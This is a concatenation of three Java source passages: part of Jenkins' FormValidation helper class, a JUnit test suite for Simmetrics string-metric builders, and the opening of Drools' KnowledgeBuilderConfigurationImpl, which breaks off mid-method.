return _error(Kind.ERROR, e, message);
}
public static FormValidation warning(Throwable e, String message) {
return _error(Kind.WARNING, e, message);
}
private static FormValidation _error(Kind kind, Throwable e, String message) {
if (e==null) return _errorWithMarkup(Util.escape(message),kind);
return _errorWithMarkup(Util.escape(message)+
" <a href='#' class='showDetails'>"
+ Messages.FormValidation_Error_Details()
+ "</a><pre style='display:none'>"
+ Functions.printThrowable(e) +
"</pre>",kind
);
}
public static FormValidation error(Throwable e, String format, Object... args) {
return error(e,String.format(format,args));
}
public static FormValidation warning(Throwable e, String format, Object... args) {
return warning(e,String.format(format,args));
}
/**
* Aggregate multiple validations into one.
*
* @return Validation of the least successful kind aggregating all child messages.
* @since TODO
*/
public static @Nonnull FormValidation aggregate(@Nonnull Collection<FormValidation> validations) {
if (validations == null || validations.isEmpty()) return FormValidation.ok();
if (validations.size() == 1) return validations.iterator().next();
final StringBuilder sb = new StringBuilder("<ul style='list-style-type: none; padding-left: 0; margin: 0'>");
FormValidation.Kind worst = Kind.OK;
for (FormValidation validation: validations) {
sb.append("<li>").append(validation.renderHtml()).append("</li>");
if (validation.kind.ordinal() > worst.ordinal()) {
worst = validation.kind;
}
}
sb.append("</ul>");
return respond(worst, sb.toString());
}
/**
* Sends out an HTML fragment that indicates an error.
*
* <p>
* This method must be used with care to avoid cross-site scripting
* attack.
*
* @param message
* Human readable message to be sent. <tt>error(null)</tt>
* can be used as <tt>ok()</tt>.
*/
public static FormValidation errorWithMarkup(String message) {
return _errorWithMarkup(message,Kind.ERROR);
}
public static FormValidation warningWithMarkup(String message) {
return _errorWithMarkup(message,Kind.WARNING);
}
public static FormValidation okWithMarkup(String message) {
return _errorWithMarkup(message,Kind.OK);
}
private static FormValidation _errorWithMarkup(final String message, final Kind kind) {
if(message==null)
return ok();
return new FormValidation(kind, message) {
public String renderHtml() {
StaplerRequest req = Stapler.getCurrentRequest();
if (req == null) { // being called from some other context
return message;
}
// 1x16 spacer needed for IE since it doesn't support min-height
return "<div class="+ kind.name().toLowerCase(Locale.ENGLISH) +"><img src='"+
req.getContextPath()+ Jenkins.RESOURCE_PATH+"/images/none.gif' height=16 width=1>"+
message+"</div>";
}
@Override public String toString() {
return kind + ": " + message;
}
};
}
/**
* Sends out an arbitrary HTML fragment as the output.
*/
public static FormValidation respond(Kind kind, final String html) {
return new FormValidation(kind) {
public String renderHtml() {
return html;
}
@Override public String toString() {
return kind + ": " + html;
}
};
}
/**
* Performs an application-specific validation on the given file.
*
* <p>
* This is used as a piece in a bigger validation effort.
*/
public static abstract class FileValidator {
public abstract FormValidation validate(File f);
/**
* Singleton instance that does no check.
*/
public static final FileValidator NOOP = new FileValidator() {
public FormValidation validate(File f) {
return ok();
}
};
}
/**
* Makes sure that the given string points to an executable file.
*/
public static FormValidation validateExecutable(String exe) {
return validateExecutable(exe, FileValidator.NOOP);
}
/**
* Makes sure that the given string points to an executable file.
*
* @param exeValidator
* If the validation process discovers a valid executable program on the given path,
* the specified {@link FileValidator} can perform additional checks (such as making sure
* that it has the right version, etc.)
*/
public static FormValidation validateExecutable(String exe, FileValidator exeValidator) {
// insufficient permission to perform validation?
if(!Jenkins.getInstance().hasPermission(Jenkins.ADMINISTER)) return ok();
exe = fixEmpty(exe);
if(exe==null)
return ok();
if(exe.indexOf(File.separatorChar)>=0) {
// this is full path
File f = new File(exe);
if(f.exists()) return exeValidator.validate(f);
File fexe = new File(exe+".exe");
if(fexe.exists()) return exeValidator.validate(fexe);
return error("There's no such file: "+exe);
}
// look in PATH
String path = EnvVars.masterEnvVars.get("PATH");
String tokenizedPath = "";
String delimiter = null;
if(path!=null) {
for (String _dir : Util.tokenize(path.replace("\\", "\\\\"),File.pathSeparator)) {
if (delimiter == null) {
delimiter = ", ";
}
else {
tokenizedPath += delimiter;
}
tokenizedPath += _dir.replace('\\', '/');
File dir = new File(_dir);
File f = new File(dir,exe);
if(f.exists()) return exeValidator.validate(f);
File fexe = new File(dir,exe+".exe");
if(fexe.exists()) return exeValidator.validate(fexe);
}
tokenizedPath += ".";
} else {
tokenizedPath = "unavailable.";
}
// didn't find it
return error("There's no such executable "+exe+" in PATH: "+tokenizedPath);
}
/**
* Makes sure that the given string is a non-negative integer.
*/
public static FormValidation validateNonNegativeInteger(String value) {
try {
if(Integer.parseInt(value)<0)
return error(hudson.model.Messages.Hudson_NotANonNegativeNumber());
return ok();
} catch (NumberFormatException e) {
return error(hudson.model.Messages.Hudson_NotANumber());
}
}
/**
* Makes sure that the given string is a positive integer.
*/
public static FormValidation validatePositiveInteger(String value) {
try {
if(Integer.parseInt(value)<=0)
return error(hudson.model.Messages.Hudson_NotAPositiveNumber());
return ok();
} catch (NumberFormatException e) {
return error(hudson.model.Messages.Hudson_NotANumber());
}
}
/**
* Makes sure that the given string is not null or empty.
*/
public static FormValidation validateRequired(String value) {
if (Util.fixEmptyAndTrim(value) == null)
return error(Messages.FormValidation_ValidateRequired());
return ok();
}
/**
* Makes sure that the given string is a base64 encoded text.
*
* @param allowWhitespace
* if you allow whitespace (CR,LF,etc) in base64 encoding
* @param allowEmpty
* Is empty string allowed?
* @param errorMessage
* Error message.
* @since 1.305
*/
public static FormValidation validateBase64(String value, boolean allowWhitespace, boolean allowEmpty, String errorMessage) {
try {
String v = value;
if(!allowWhitespace) {
if(v.indexOf(' ')>=0 || v.indexOf('\n')>=0)
return error(errorMessage);
}
v=v.trim();
if(!allowEmpty && v.length()==0)
return error(errorMessage);
com.trilead.ssh2.crypto.Base64.decode(v.toCharArray());
return ok();
} catch (IOException e) {
return error(errorMessage);
}
}
/**
* Convenient base class for checking the validity of URLs.
*
* <p>
* This allows the check method to call various utility methods in a concise syntax.
*/
public static abstract class URLCheck {
/**
* Opens the given URL and reads text content from it.
* This method honors Content-type header.
*/
protected BufferedReader open(URL url) throws IOException {
// use HTTP content type to find out the charset.
URLConnection con = ProxyConfiguration.open(url);
if (con == null) { // TODO is this even permitted by URL.openConnection?
throw new IOException(url.toExternalForm());
}
return new BufferedReader(
new InputStreamReader(con.getInputStream(),getCharset(con)));
}
/**
* Finds the string literal from the given reader.
* @return
* true if found, false otherwise.
*/
protected boolean findText(BufferedReader in, String literal) throws IOException {
String line;
while((line=in.readLine())!=null)
if(line.indexOf(literal)!=-1)
return true;
return false;
}
/**
* Calls the {@link FormValidation#error(String)} method with a reasonable error message.
* Use this method when the {@link #open(URL)} or {@link #findText(BufferedReader, String)} fails.
*
* @param url
* Pass in the URL that was connected. Used for error diagnosis.
*/
protected FormValidation handleIOException(String url, IOException e) throws IOException, ServletException {
// any invalid URL comes here
if(e.getMessage().equals(url))
// Sun JRE (and probably others too) often return just the URL in the error.
return error("Unable to connect "+url);
else
return error(e.getMessage());
}
/**
* Figures out the charset from the content-type header.
*/
private String getCharset(URLConnection con) {
for( String t : con.getContentType().split(";") ) {
t = t.trim().toLowerCase(Locale.ENGLISH);
if(t.startsWith("charset="))
return t.substring(8);
}
// couldn't find it. HTML spec says default is US-ASCII,
// but UTF-8 is a better choice since
// (1) it's compatible with US-ASCII
// (2) a well-written web applications tend to use UTF-8
return "UTF-8";
}
/**
* Implement the actual form validation logic, by using other convenience methosd defined in this class.
* If you are not using any of those, you don't need to extend from this class.
*/
protected abstract FormValidation check() throws IOException, ServletException;
}
public final Kind kind;
/**
* Instances should be created via one of the factory methods above.
* @param kind
*/
private FormValidation(Kind kind) {
this.kind = kind;
}
private FormValidation(Kind kind, String message) {
super(message);
this.kind = kind;
}
public void generateResponse(StaplerRequest req, StaplerResponse rsp, Object node) throws IOException, ServletException {
respond(rsp, renderHtml());
}
public abstract String renderHtml();
/**
* Sends out an arbitrary HTML fragment as the output.
*/
protected void respond(StaplerResponse rsp, String html) throws IOException, ServletException {
rsp.setContentType("text/html;charset=UTF-8");
rsp.getWriter().print(html);
}
/**
* Builds up the check URL for the client-side JavaScript to call back.
*/
public static class CheckMethod {
private final Descriptor descriptor;
private final Method method;
private final String capitalizedFieldName;
/**
* Names of the parameters to pass from the client.
*/
private final List<String> names;
private volatile String checkUrl; // cached once computed
private volatile String dependsOn; // cached once computed
public CheckMethod(Descriptor descriptor, String fieldName) {
this.descriptor = descriptor;
this.capitalizedFieldName = StringUtils.capitalize(fieldName);
method = ReflectionUtils.getPublicMethodNamed(descriptor.getClass(), "doCheck" + capitalizedFieldName);
if(method !=null) {
names = new ArrayList<String>();
findParameters(method);
} else {
names = null;
}
}
/**
* Builds query parameter line by figuring out what should be submitted
*/
private void findParameters(Method method) {
for (Parameter p : ReflectionUtils.getParameters(method)) {
QueryParameter qp = p.annotation(QueryParameter.class);
if (qp!=null) {
String name = qp.value();
if (name.length()==0) name = p.name();
if (name==null || name.length()==0)
continue; // unknown parameter name. we'll report the error when the form is submitted.
if (name.equals("value"))
continue; // 'value' parameter is implicit
RelativePath rp = p.annotation(RelativePath.class);
if (rp!=null)
name = rp.value()+'/'+name;
names.add(name);
continue;
}
Method m = ReflectionUtils.getPublicMethodNamed(p.type(), "fromStapler");
if (m!=null) findParameters(m);
}
}
/**
* Obtains the 1.526-compatible single string representation.
*
* This method computes JavaScript expression, which evaluates to the URL that the client should request
* the validation to.
* A modern version depends on {@link #toStemUrl()} and {@link #getDependsOn()}
*/
public String toCheckUrl() {
if (names==null) return null;
if (checkUrl==null) {
StringBuilder buf = new StringBuilder(singleQuote(relativePath()));
if (!names.isEmpty()) {
buf.append("+qs(this).addThis()");
for (String name : names) {
buf.append(".nearBy('"+name+"')");
}
buf.append(".toString()");
}
checkUrl = buf.toString();
}
// put this under the right contextual umbrella.
// 'a' in getCurrentDescriptorByNameUrl is always non-null because we already have Hudson as the sentinel
return '\'' + jsStringEscape(Descriptor.getCurrentDescriptorByNameUrl()) + "/'+" + checkUrl;
}
/**
* Returns the URL that the JavaScript should hit to perform form validation, except
* the query string portion (which is built on the client side.)
*/
public String toStemUrl() {
if (names==null) return null;
return jsStringEscape(Descriptor.getCurrentDescriptorByNameUrl()) + '/' + relativePath();
}
public String getDependsOn() {
if (names==null) return null;
if (dependsOn==null)
dependsOn = join(names," ");
return dependsOn;
}
private String relativePath() {
return descriptor.getDescriptorUrl() + "/check" + capitalizedFieldName;
}
}
}
|
|
/*-
* #%L
* Simmetrics - Core
* %%
* Copyright (C) 2014 - 2021 Simmetrics Authors
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
package com.github.mpkorstanje.simmetrics.builders;
import com.github.mpkorstanje.simmetrics.simplifiers.SimplifiersMatcher;
import com.google.common.collect.Multiset;
import org.junit.jupiter.api.Test;
import com.github.mpkorstanje.simmetrics.Metric;
import com.github.mpkorstanje.simmetrics.StringMetric;
import com.github.mpkorstanje.simmetrics.StringMetricTest;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForList;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForListWithSimplifier;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForMultiset;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForMultisetWithSimplifier;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForSet;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForSetWithSimplifier;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForString;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForStringWithSimplifier;
import com.github.mpkorstanje.simmetrics.metrics.Identity;
import com.github.mpkorstanje.simmetrics.simplifiers.Simplifier;
import com.github.mpkorstanje.simmetrics.simplifiers.Simplifiers;
import com.github.mpkorstanje.simmetrics.tokenizers.Tokenizer;
import com.github.mpkorstanje.simmetrics.tokenizers.Tokenizers;
import java.util.List;
import java.util.Set;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertSame;
import static org.hamcrest.MatcherAssert.assertThat;
import static com.github.mpkorstanje.simmetrics.simplifiers.Simplifiers.toLowerCase;
import static com.github.mpkorstanje.simmetrics.tokenizers.Tokenizers.whitespace;
final class StringMetricsTest {
public static class Create {
private final Metric<String> metric = new Identity<>();
private final Metric<List<String>> listMetric = new Identity<>();
private final Metric<Set<String>> setMetric = new Identity<>();
private final Simplifier simplifier = Simplifiers.toLowerCase();
private final Simplifier simplifier2 = Simplifiers.removeNonWord();
private final Tokenizer tokenizer = Tokenizers.whitespace();
@Test
void shouldReturnSame() {
StringMetric s = new ForString(metric);
assertSame(s, StringMetrics.create(s));
}
@Test
void shouldReturnForString() {
StringMetric wrapped = StringMetrics.create(metric);
assertEquals(ForString.class, wrapped.getClass());
ForString forString = (ForString) wrapped;
assertSame(metric, forString.getMetric());
}
@Test
void shouldReturnForStringWithSimplifier() {
ForString forString = new ForString(metric);
StringMetric wrapped = StringMetrics.create(forString, simplifier);
assertEquals(ForStringWithSimplifier.class, wrapped.getClass());
ForStringWithSimplifier fsws = (ForStringWithSimplifier) wrapped;
assertSame(metric, fsws.getMetric());
assertSame(simplifier, fsws.getSimplifier());
}
@Test
void shouldReturnForStringWithChainedSimplifiers() {
ForStringWithSimplifier forString = new ForStringWithSimplifier(metric, simplifier);
StringMetric wrapped = StringMetrics.create(forString, simplifier2);
assertEquals(ForStringWithSimplifier.class, wrapped.getClass());
ForStringWithSimplifier fsws = (ForStringWithSimplifier) wrapped;
assertSame(metric, fsws.getMetric());
}
@Test
void shouldReturnForListWithSimplifier() {
ForList forList = new ForList(listMetric, tokenizer);
StringMetric wrapped = StringMetrics.create(forList, simplifier);
assertEquals(ForListWithSimplifier.class, wrapped.getClass());
ForListWithSimplifier flws = (ForListWithSimplifier) wrapped;
assertSame(listMetric, flws.getMetric());
assertEquals(simplifier, flws.getSimplifier());
assertSame(tokenizer, flws.getTokenizer());
}
@Test
void shouldReturnForListWithChainedSimplifiers() {
ForListWithSimplifier forList = new ForListWithSimplifier(listMetric, simplifier, tokenizer);
StringMetric wrapped = StringMetrics.create(forList, simplifier2);
assertEquals(ForListWithSimplifier.class, wrapped.getClass());
ForListWithSimplifier flws = (ForListWithSimplifier) wrapped;
assertSame(listMetric, flws.getMetric());
assertThat(flws.getSimplifier(), SimplifiersMatcher.chain(simplifier2, simplifier));
assertSame(tokenizer, flws.getTokenizer());
}
@Test
void shouldReturnForSetWithSimplifier() {
ForSet forSet = new ForSet(setMetric, tokenizer);
StringMetric wrapped = StringMetrics.create(forSet, simplifier);
assertEquals(ForSetWithSimplifier.class, wrapped.getClass());
ForSetWithSimplifier fsws = (ForSetWithSimplifier) wrapped;
assertSame(setMetric, fsws.getMetric());
assertSame(simplifier, fsws.getSimplifier());
assertSame(tokenizer, fsws.getTokenizer());
}
@Test
void shouldReturnForSetWithChainedSimplifiers() {
ForSetWithSimplifier forSet = new ForSetWithSimplifier(setMetric, simplifier, tokenizer);
StringMetric wrapped = StringMetrics.create(forSet, simplifier2);
assertEquals(ForSetWithSimplifier.class, wrapped.getClass());
ForSetWithSimplifier fsws = (ForSetWithSimplifier) wrapped;
assertSame(setMetric, fsws.getMetric());
assertThat(fsws.getSimplifier(), SimplifiersMatcher.chain(simplifier2, simplifier));
assertSame(tokenizer, fsws.getTokenizer());
}
}
public static class CreateForList {
private Metric<List<String>> metric = new Identity<>();
private Tokenizer tokenizer = Tokenizers.whitespace();
private Simplifier simplifier = Simplifiers.toLowerCase();
@Test
void shouldReturnForList() {
StringMetric wrapped = StringMetrics.createForListMetric(metric, tokenizer);
assertEquals(ForList.class, wrapped.getClass());
ForList forList = (ForList) wrapped;
assertSame(metric, forList.getMetric());
assertSame(tokenizer, forList.getTokenizer());
}
@Test
void shouldReturnForListWithSimplifier() {
StringMetric wrapped = StringMetrics.createForListMetric(metric, simplifier, tokenizer);
assertEquals(ForListWithSimplifier.class, wrapped.getClass());
ForListWithSimplifier forList = (ForListWithSimplifier) wrapped;
assertSame(metric, forList.getMetric());
assertSame(tokenizer, forList.getTokenizer());
assertSame(simplifier, forList.getSimplifier());
}
}
public static class CreateForSet {
private Metric<Set<String>> metric = new Identity<>();
private Tokenizer tokenizer = Tokenizers.whitespace();
private Simplifier simplifier = Simplifiers.toLowerCase();
@Test
void shouldReturnForSet() {
StringMetric wrapped = StringMetrics.createForSetMetric(metric, tokenizer);
assertEquals(ForSet.class, wrapped.getClass());
ForSet forSet = (ForSet) wrapped;
assertSame(metric, forSet.getMetric());
assertSame(tokenizer, forSet.getTokenizer());
}
@Test
void shouldReturnForSetWithSimplifier() {
StringMetric wrapped = StringMetrics.createForSetMetric(metric, simplifier, tokenizer);
assertEquals(ForSetWithSimplifier.class, wrapped.getClass());
ForSetWithSimplifier forSet = (ForSetWithSimplifier) wrapped;
assertSame(metric, forSet.getMetric());
assertSame(tokenizer, forSet.getTokenizer());
assertSame(simplifier, forSet.getSimplifier());
}
}
public static class CreateForMultiset {
private Metric<Multiset<String>> metric = new Identity<>();
private Tokenizer tokenizer = Tokenizers.whitespace();
private Simplifier simplifier = Simplifiers.toLowerCase();
@Test
void shouldReturnForSet() {
StringMetric wrapped = StringMetrics.createForMultisetMetric(metric, tokenizer);
assertEquals(ForMultiset.class, wrapped.getClass());
ForMultiset forSet = (ForMultiset) wrapped;
assertSame(metric, forSet.getMetric());
assertSame(tokenizer, forSet.getTokenizer());
}
@Test
void shouldReturnForSetWithSimplifier() {
StringMetric wrapped = StringMetrics.createForMultisetMetric(metric, simplifier, tokenizer);
assertEquals(ForMultisetWithSimplifier.class, wrapped.getClass());
ForMultisetWithSimplifier forSet = (ForMultisetWithSimplifier) wrapped;
assertSame(metric, forSet.getMetric());
assertSame(tokenizer, forSet.getTokenizer());
assertSame(simplifier, forSet.getSimplifier());
}
}
public static class ForListTest extends StringMetricTest {
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<List<String>> identity = new Identity<>();
return new ForList(identity, whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "a b c","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForListWithSimplifierTest extends StringMetricTest {
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected boolean satisfiesCoincidence() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<List<String>> identity = new Identity<>();
return new ForListWithSimplifier(identity, toLowerCase(), whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "A B C","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForSetTest extends StringMetricTest {
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<Set<String>> identity = new Identity<>();
return new StringMetrics.ForSet(identity, whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "a b c","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForSetWithSimplifierTest extends StringMetricTest {
@Override
protected boolean satisfiesCoincidence() {
return false;
}
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<Set<String>> identity = new Identity<>();
return new ForSetWithSimplifier(identity, toLowerCase(), whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "A B C","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForMultisetTest extends StringMetricTest {
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<Multiset<String>> identity = new Identity<>();
return new StringMetrics.ForMultiset(identity, whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "a b c","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForMultisetWithSimplifierTest extends StringMetricTest {
@Override
protected boolean satisfiesCoincidence() {
return false;
}
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<Multiset<String>> identity = new Identity<>();
return new StringMetrics.ForMultisetWithSimplifier(identity, toLowerCase(), whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "A B C","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForStringTest extends StringMetricTest {
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<String> identity = new Identity<>();
return new ForString(identity);
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "a b c","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForStringWithSimplifierTest extends StringMetricTest {
@Override
protected boolean satisfiesCoincidence() {
return false;
}
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<String> identity = new Identity<>();
return new ForStringWithSimplifier(identity, toLowerCase());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "A B C","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
}
|
|
/*
* Copyright 2005 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.drools.compiler.builder.impl;
import java.io.File;
import java.net.URL;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Properties;
import java.util.Set;
import org.drools.compiler.compiler.Dialect;
import org.drools.compiler.compiler.DialectCompiletimeRegistry;
import org.drools.compiler.compiler.DialectConfiguration;
import org.drools.compiler.compiler.DrlParser;
import org.drools.compiler.compiler.PackageRegistry;
import org.drools.compiler.compiler.xml.RulesSemanticModule;
import org.drools.compiler.kie.builder.impl.InternalKieModule.CompilationCache;
import org.drools.compiler.rule.builder.ConstraintBuilder;
import org.drools.compiler.rule.builder.util.AccumulateUtil;
import org.drools.core.base.evaluators.EvaluatorDefinition;
import org.drools.core.base.evaluators.EvaluatorRegistry;
import org.drools.core.definitions.InternalKnowledgePackage;
import org.drools.core.util.ClassUtils;
import org.drools.core.util.ConfFileUtils;
import org.drools.core.util.StringUtils;
import org.drools.core.xml.ChangeSetSemanticModule;
import org.drools.core.xml.DefaultSemanticModule;
import org.drools.core.xml.Handler;
import org.drools.core.xml.SemanticModule;
import org.drools.core.xml.SemanticModules;
import org.drools.core.xml.WrapperSemanticModule;
import org.drools.wiring.api.classloader.ProjectClassLoader;
import org.kie.api.runtime.rule.AccumulateFunction;
import org.kie.internal.builder.KnowledgeBuilderConfiguration;
import org.kie.internal.builder.ResultSeverity;
import org.kie.internal.builder.conf.AccumulateFunctionOption;
import org.kie.internal.builder.conf.AlphaNetworkCompilerOption;
import org.kie.internal.builder.conf.ClassLoaderCacheOption;
import org.kie.internal.builder.conf.DefaultDialectOption;
import org.kie.internal.builder.conf.DefaultPackageNameOption;
import org.kie.internal.builder.conf.DumpDirOption;
import org.kie.internal.builder.conf.EvaluatorOption;
import org.kie.internal.builder.conf.ExternaliseCanonicalModelLambdaOption;
import org.kie.internal.builder.conf.GroupDRLsInKieBasesByFolderOption;
import org.kie.internal.builder.conf.KBuilderSeverityOption;
import org.kie.internal.builder.conf.KnowledgeBuilderOption;
import org.kie.internal.builder.conf.LanguageLevelOption;
import org.kie.internal.builder.conf.MultiValueKnowledgeBuilderOption;
import org.kie.internal.builder.conf.ParallelLambdaExternalizationOption;
import org.kie.internal.builder.conf.ParallelRulesBuildThresholdOption;
import org.kie.internal.builder.conf.ProcessStringEscapesOption;
import org.kie.internal.builder.conf.PropertySpecificOption;
import org.kie.internal.builder.conf.SingleValueKnowledgeBuilderOption;
import org.kie.internal.builder.conf.TrimCellsInDTableOption;
import org.kie.internal.utils.ChainedProperties;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* This class configures the package compiler.
* Dialects and their DialectConfigurations are handled by the DialectRegistry
* Normally you will not need to look at this class, unless you want to override the defaults.
*
* This class is not thread safe and it also contains state. Once it is created and used
* in one or more PackageBuilders it should be considered immutable. Do not modify its
* properties while it is being used by a PackageBuilder.
*
* drools.dialect.default = <String>
* drools.accumulate.function.<function name> = <qualified class>
* drools.evaluator.<ident> = <qualified class>
* drools.dump.dir = <String>
* drools.classLoaderCacheEnabled = true|false
* drools.parallelRulesBuildThreshold = <int>
*
* default dialect is java.
* Available preconfigured Accumulate functions are:
* drools.accumulate.function.average = org.kie.base.accumulators.AverageAccumulateFunction
* drools.accumulate.function.max = org.kie.base.accumulators.MaxAccumulateFunction
* drools.accumulate.function.min = org.kie.base.accumulators.MinAccumulateFunction
* drools.accumulate.function.count = org.kie.base.accumulators.CountAccumulateFunction
* drools.accumulate.function.sum = org.kie.base.accumulators.SumAccumulateFunction
*
* drools.parser.processStringEscapes = true|false
*
*
* drools.problem.severity.<ident> = ERROR|WARNING|INFO
*
*/
public class KnowledgeBuilderConfigurationImpl
implements
KnowledgeBuilderConfiguration {
public static final String DEFAULT_PACKAGE = "defaultpkg";
private static final int DEFAULT_PARALLEL_RULES_BUILD_THRESHOLD = 10;
private final Map<String, DialectConfiguration> dialectConfigurations = new HashMap<>();
private DefaultDialectOption defaultDialect = DefaultDialectOption.get("java");
private ParallelRulesBuildThresholdOption parallelRulesBuildThreshold = ParallelRulesBuildThresholdOption.get(DEFAULT_PARALLEL_RULES_BUILD_THRESHOLD);
private ClassLoader classLoader;
private ChainedProperties chainedProperties;
private Map<String, AccumulateFunction> accumulateFunctions;
private EvaluatorRegistry evaluatorRegistry;
private SemanticModules semanticModules;
private File dumpDirectory;
private boolean processStringEscapes = true;
private boolean classLoaderCache = true;
private boolean trimCellsInDTable = true;
private boolean groupDRLsInKieBasesByFolder = false;
private boolean externaliseCanonicalModelLambda = true;
private boolean parallelLambdaExternalization = true;
private AlphaNetworkCompilerOption alphaNetworkCompilerOption = AlphaNetworkCompilerOption.DISABLED;
private static final PropertySpecificOption DEFAULT_PROP_SPEC_OPT = PropertySpecificOption.ALWAYS;
private PropertySpecificOption propertySpecificOption = DEFAULT_PROP_SPEC_OPT;
private String defaultPackageName;
private Map<String, ResultSeverity> severityMap;
private LanguageLevelOption languageLevel = DrlParser.DEFAULT_LANGUAGE_LEVEL;
private CompilationCache compilationCache = null;
private static final Logger log = LoggerFactory.getLogger(KnowledgeBuilderConfigurationImpl.class);
/**
* Constructor that sets the parent class loader for the package being built/compiled
*/
public KnowledgeBuilderConfigurationImpl(ClassLoader classLoader) {
init(null, classLoader);
}
/**
* Programmatic properties file, added with lease precedence
*/
public KnowledgeBuilderConfigurationImpl(Properties properties) {
init(properties, null);
}
/**
* Programmatic properties file, added with lease precedence
*/
public KnowledgeBuilderConfigurationImpl(Properties properties, ClassLoader classLoader) {
init(properties, classLoader);
}
public KnowledgeBuilderConfigurationImpl() {
init(null, null);
}
private void init(Properties properties, ClassLoader classLoader) {
this.classLoader = ProjectClassLoader.getClassLoader(classLoader, getClass(), isClassLoaderCacheEnabled());
init(properties);
}
private void init(Properties properties) {
this.chainedProperties = ChainedProperties.getChainedProperties( getClassLoader() );
if (chainedProperties.getProperty("drools.dialect.java", null) == null) {
// if it couldn't find a conf for java dialect using the project class loader
// it means it could not load the conf file at all (very likely it is running in
// an osgi environement) so try with the class loader of this class
this.chainedProperties = ChainedProperties.getChainedProperties( getClass().getClassLoader() );
if (this.classLoader instanceof ProjectClassLoader ) {
((ProjectClassLoader) classLoader).setDroolsClassLoader(getClass().getClassLoader());
}
}
if (properties != null) {
this.chainedProperties.addProperties(properties);
}
setProperty(ClassLoaderCacheOption.PROPERTY_NAME,
this.chainedProperties.getProperty(ClassLoaderCacheOption.PROPERTY_NAME,
"true"));
setProperty( TrimCellsInDTableOption.PROPERTY_NAME,
this.chainedProperties.getProperty(TrimCellsInDTableOption.PROPERTY_NAME,
"true"));
setProperty( GroupDRLsInKieBasesByFolderOption.PROPERTY_NAME,
this.chainedProperties.getProperty(GroupDRLsInKieBasesByFolderOption.PROPERTY_NAME,
"false"));
setProperty(PropertySpecificOption.PROPERTY_NAME,
this.chainedProperties.getProperty(PropertySpecificOption.PROPERTY_NAME,
DEFAULT_PROP_SPEC_OPT.toString()));
setProperty(LanguageLevelOption.PROPERTY_NAME,
this.chainedProperties.getProperty(LanguageLevelOption.PROPERTY_NAME,
DrlParser.DEFAULT_LANGUAGE_LEVEL.toString()));
setProperty(ParallelRulesBuildThresholdOption.PROPERTY_NAME,
this.chainedProperties.getProperty(ParallelRulesBuildThresholdOption.PROPERTY_NAME,
String.valueOf(DEFAULT_PARALLEL_RULES_BUILD_THRESHOLD)));
buildDialectConfigurationMap();
this.accumulateFunctions = AccumulateUtil.buildAccumulateFunctionsMap(chainedProperties, getFunctionFactoryClassLoader() );
buildEvaluatorRegistry();
buildDumpDirectory();
buildSeverityMap();
setProperty(ProcessStringEscapesOption.PROPERTY_NAME,
this.chainedProperties.getProperty(ProcessStringEscapesOption.PROPERTY_NAME,
"true"));
setProperty(DefaultPackageNameOption.PROPERTY_NAME,
this.chainedProperties.getProperty(DefaultPackageNameOption.PROPERTY_NAME,
DEFAULT_PACKAGE));
